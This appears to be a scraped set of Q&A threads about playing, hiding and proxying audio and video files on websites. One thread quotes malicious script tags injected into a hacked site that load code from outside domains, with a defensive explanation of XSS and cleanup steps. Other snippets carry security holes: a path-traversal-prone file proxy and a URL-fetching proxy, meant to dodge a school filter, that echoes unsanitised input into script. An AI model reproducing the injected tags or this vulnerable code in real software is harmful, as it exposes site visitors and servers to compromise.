I was making a website for a band and then I used the following code
<embed src="matrix.m4a" width="180" height="90" loop="true" autostart="true" hidden="true" />
in the HTML file and the issue that I am facing is that when I load the page locally the music plays fine but when I browse the website through the internet it gives me a option to download the music matrix.m4a file.
Any fixes o this ?
Your server is not aware that the m4a file is in fact a music file, and will send it probably as application/octet-stream, which is basically 'hey, please just download this, don't try and open it yourself.'
Perhaps a bit too advanced, but you could make a php script as follows:
<?php
header('Content-Type: audio/mp4');
readfile('path/to/file.m4a')
?>
Final remark as per: only do this if you really think your users will like it. It is considered bad practice to force music on your users, generally.
Related
I was playing around with urls the other day and i was wondering if there is a way to for example substitute the domain name for a video link on page load
in the source code, while having the original link still interpreted by the browser to play the video correctly.
So for example, if i host an .mp4 on my server with following link:
<source src="https://goofy.com/dogs.mp4" type="video/mp4" label="Low" res="360">
and i would like it to appear in the source code as:
<source src="https://snoopy.com/dogs.mp4" type="video/mp4" label="Low" res="360">
but still having the goofy one played in the player, it it possible ?
(maybe with javascript ?)
What i am trying to achieve here doesn't need to be that advanced, when i meant "scrape" i was just thinking about people opening the inspector manually and simply grabbing the link, in my example:
https://goofy.com/dogs.mp4
So i was rather thinking of some simple javascript letter substitution scheme on pageload that would display some random letters instead of "goofy". Maybe something like this:
var chars = {'a':'b','c':'z','i':'e'};
var enc;
var str = "goofy.com";
window.onload = function() {
enc = str.replace(/[abc]/g, m => chars[m]);
alert(enc);
};
but i think it won't work, as the player will end up playing the url with the wrong domain name. An i'm not that good at javascript, so i'm not sure of what i'm doing either... Feel free to correct me or maybe offer some solution ? thanks.
Per your comment reply, you want to obfuscate the source urls for a video file.
No, modifying the urls in the <source/> DOM elements won't do anything for you. A bot is getting the raw html from your site, so if the original source urls are embedded there you're not going to be able to hide anything.
Moving up the stack a bit, look at how Youtube handles structuring their urls. At its core, they have a js library that handles building out the video urls and video player dynamically at run time. While its highly obfuscated, its not a huge amount of work to discover what the actual video urls are and download them if you want. If someone really wants to get your videos, its not much work to either investigate the page with dev tools in the browser.
And going low-level, its arbitrary to run a packet sniffer like Charles proxy with a man in the middle local SSL proxy service (built in) to look at the requests being sent back and forth and to easily track down the source url that are delivering the video.
You could go back 10 years and try using Flash or some other embedded 3rd party plugin to "encrypt" the video stream but that's stupid and self defeating. If I really want your videos, I'll just play them full screen and record them on my computer.
Hopefully that more thoroughly answers your question.
My website all the html and js files are affected by some scripts.
The below script inside all the html files.
<!--937592--><script type="text/javascript" src="http://jamesdeocariza.com/cnt.php?id=5653691"></script><!--/937592-->
and the below script inside all the js files.
/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/
I don't know how this code inside all the html and js files. This <!--937592--> number and the src="http://jamesdeocariza.com/cnt.php?id=5653691" src url is not static. it's dynamic number and url.
Is this Cross Side Script (XSS) Attack?
If you are not the owner of the server jamesdeocariza.com and brilleandmore.de then it looked like your server was hacked and someone injected the above code into all of your HTML and JavaScript files.
To explain XSS attacks: Imagine you have a bad written PHP file which contains code like:
<p>Your username <?php echo $_GET["user"] ?></p>
Now someone can write a malicious formed link to your site like http://example.com/index.php?user=<script>//bad things</script>. If someone clicks on such a link the server would serve an HTML document with
<p>Your username <script>//bad things</script></p>
(In reallity the link will be encoded using the URL encoding with %XY)
In your case it seems worse than just a XSS attack, because it seems that the attacker somehow could change the source code of your site. This may happen in many ways like hacking your PC or your server (maybe you have an virus on your PC). Getting access to your source repository (for example brute forcing the password of your github account) or you had a man in the middle while a unencrypted FTP upload...
Your files are somehow compromised and the next steps you need are:
Remove the above 2 code snippets from your js and HTML files(all) immediately.
Check whether your site has been blacklisted by Google using tools like Sucuri and findout which other files are affected and remove the unwanted code from those pages
If Google already blacklisted your website, you will have to request a review AFTER cleaning all the infected files
Search for unwanted dynamic codes which are probably there as a result of this compromising and remove those files.
Find out how the attack may have occurred and fix it(website access logs will come in handy here)
Good morning,
I have put together a music player using modified examples on SO. My player plays songs fine if the file is located within the website's directory, however I wish to change it so that the source can exist anywhere on the server. I have looked on here for examples of this however the ones I find either don't work or do not apply to my situation.
Currently I have this line:
<audio id="audio-player" src="media/song.mp3" type="audio/mp3" controls="controls"></audio>
which plays the file located within the folder media in the website directory.
What I want is something like this:
<audio id="audio-player" src="C:\song.mp3" type="audio/mp3" controls="controls"></audio>
Currently I am doing it with HTML and JS but am open to any suggestions. All I really care about is that I can make a music player that can play files from any location, regardless of how this is done.
Thanks for your time.
When the url is C:\song.mp3 you tell the user to access THEIR local C drive. you need to create a proxy webpage that accesses files that are not in your local web root (public_html). So you can create a webpage in your local webroot that has the following code :
proxy.php
<?php
header("Content-Type: audio/mp3");
echo file_get_contents("C:\\audio\\" . $_GET["name"] . ".mp3");
?>
If you wanted to access the desired audio file you would go to the url proxy.php?name=song. Like so
<audio id="audio-player" src="proxy.php?name=song" type="audio/mp3" controls="controls"></audio>
You should also prevent any "..\" and possibly "~" so they cant access parent folders.
Browsers cannot access arbitrary files on the server's file system. You can't give a Windows file path on the server.
You need to:
Make the file available over HTTP
Give the URL to that file
I almost feel ashamed to ask such a basic question, what with how i like to term my self a website genius when with friends this seems quite basic.
I'm trying to get visitors to my site to download an mp3 link=> "http://www.podbean.com/podcast-directory-download-public/4995714/10_Commandments_Of_A_Successful_Home_Pst_Abiodun_Koloewo.mp3". But the problem i'm facing is that it won't download unless one right clicks and selects "save link as" and i can't do anything about it since the file's not on my server. any help here?
You have two methods, one of which only works in Chrome.
Use the download attribute:
Though this is used in Firefox, it states:In Firefox 20 this attribute is only honored for links to resources with the same-origin. so it doesn't work.
Example:
<a href="http://www.podbean.com/podcast-directory-download-public/4995714/10_Commandments_Of_A_Successful_Home_Pst_Abiodun_Koloewo.mp3" download>Download Song</a>
Use your server as a proxy:
Example:
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary");
header("Content-disposition: attachment;filename=\"10_Commandments_Of_A_Successful_Home_Pst_Abiodun_Koloewo.mp3\"");
readfile("http://www.podbean.com/podcast-directory-download-public/4995714/10_Commandments_Of_A_Successful_Home_Pst_Abiodun_Koloewo.mp3");
For this example to work, please enable allow_url_fopen.
In addition to this, I would recommend saving the song file on your server, so that new requests for this song can just be downloaded from your server again.
At school, there are blocks on sites. I intend to undo that. Even if I don't, I like this idea. So: I have a php page (source.php) to get source code of any site (no cross site ajax).
<?php
echo file_get_contents(urldecode($_GET["url"]));
?>
<script>
if(document.getElementsByTagName("base")[0])
document.getElementsByTagName("base")[0].href="<?php echo $_GET["url"] ?>";
else
document.head.appendChild(document.createElement("base").href="<?php
echo $_GET["url"] ?>");
</script>
Simple. Here is the index.html
<html><head><title>Unblocker</title></head><body>
<div width="100%" height="10%">
<form onsubmit="return go()">
<input id="url" value="http://www.google.com/">
<input type="submit" value="Go">
</form>
</div>
<div width="100%" height="90%">
<iframe src="http://www.google.com/" width="100%" height="100%" id="frame">
</iframe>
</div></body></html>
And now the javascript (to be inserted into the head tag)
function go(){
url=document.getElementById("url").value;
frame=document.getElementById("frame");
//do some url validations, not posting cause doesn't matter
if(url.isValid)//example
frame.contentWindow.location=location.protocol+"//"+location.hostname+"/
source.php?url="+url;
return false;//to prevent page reload
}
A couple of things: First, is this legal, taking whole source codes and displaying them despite my good intent? Also, will it work, or is there anything obvious that can make it better? I know that the server side can't be filtered (assuming that this site is not blocked!). I know that it is very limited, but I might be able to expand it to allow clicking links and all.
You intend to write a proxy. I think you should simply use http://www.phpproxy.net or look for a proxy software and install it on your server.
OR you could go on and do it. You could end up with a product and you will have learned a lot about the HTTP protocol and creating a proxy. Surely more than you can learn at school.
Proxies are not illegal, but it's probably against your school rules, assuming they have those rules written down somewhere and they didn't forget about the proxy thing. :)
Is it legal? Sure, you are viewing interpreted source code on every page you go to. That doesn't mean your school won't flog you for circumventing their firewall.
Will it work? Yes and no. You will get the source code, but most likely if you are viewing a blocked domain you won't be able to view any pictures. Your file_get_contents is grabbing the HTML and the links for the pictures. To get the pics and replace links your PHP script will have to be somewhat sophisticated.
Nice Idea. It sounds like you just want a proxy server tho.
Do you really think the FBI is going to come knocking on your door if they knew your PHP server was getting HTML? absolutely not. Servers everywhere do this every day, such as googlebot. I'd say you're in the clear.